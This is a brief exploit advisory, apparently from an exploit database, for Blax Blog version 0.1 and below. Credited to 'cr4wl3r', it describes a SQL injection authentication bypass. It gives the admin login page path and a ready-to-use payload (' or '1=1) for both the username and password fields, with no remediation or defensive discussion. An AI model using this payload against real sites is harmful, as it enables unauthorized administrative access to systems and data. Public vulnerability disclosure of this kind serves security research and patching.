Blax Blog versions 0.1 and below suffer from a remote SQL injection vulnerability that allows for authentication bypass.
1d50d6fbd68c9eb69538cf91ebc29ef5f3bddccfa093bea3b166e7384b749491
# Blax Blog <= 0.1 (Auth Bypass) SQL Injection Vulnerability
# By cr4wl3r
# Download: https://www.proje3x.com/indir/blax.rar
# PoC: [path]/admin/girisyap.php
# Username: ' or '1=1
# password: ' or '1=1